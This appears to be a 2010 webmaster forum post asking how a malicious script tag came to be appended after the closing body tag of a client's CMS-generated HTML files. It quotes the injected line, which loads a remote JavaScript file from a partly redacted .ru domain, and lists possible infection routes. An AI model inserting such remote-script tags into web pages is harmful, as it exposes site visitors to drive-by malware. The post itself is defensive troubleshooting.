Just received 2 malware alerts from Google.
Both domains are from one of my clients.
My client is just right now on holiday
so I can not check his computer.
In all cases at the end of the HTML file after the </BODY>
appears:
<script type="text/javascript" src="http://******.ru/Base_Station.js"></script>
<!--87dbfb1e3d8895fc7e5012f8de4337d0-->
All the files are created by my own CMS
my client works with the CMS
So there are this theories:
1) Malware checks on my clients computers all stroed *.htm files and attaches the script
2) FTP program is infected and attaches script
3) on the way to the server
4) The server is infected
What is most realistic of this theories?
[edited by: tedster at 10:04 pm (utc) on Aug 22, 2010]
[edit reason] obscure the malware domain [/edit]